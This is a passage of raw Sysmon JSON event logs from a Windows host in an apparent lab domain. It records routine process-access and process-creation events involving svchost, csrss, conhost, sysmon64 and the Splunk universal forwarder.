07:54:34.516","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2767,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FBA-5F25-0000-00107BE30400}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FBA-5F25-0000-00107BE30400}","TargetProcessId":"3380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2768,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.641\r\nSourceProcessGUID: {41C8662E-1FBA-5F25-0000-00107BE30400}\r\nSourceProcessId: 3380\r\nSourceThreadId: 3384\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.641","SourceProcessGUID":"{41C8662E-1FBA-5F25-0000-00107BE30400}","SourceProcessId":"3380","SourceThreadId":"3384","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2769,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.377\r\nProcessGuid: {41C8662E-1FBB-5F25-0000-00103CE50400}\r\nProcessId: 4384\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.377","ProcessGuid":"{41C8662E-1FBB-5F25-0000-00103CE50400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2770,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FBB-5F25-0000-00103CE50400}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FBB-5F25-0000-00103CE50400}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2771,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FBB-5F25-0000-00103CE50400}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FBB-5F25-0000-00103CE50400}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2772,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2773,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2774,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:35.376","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2775,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:35.376\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 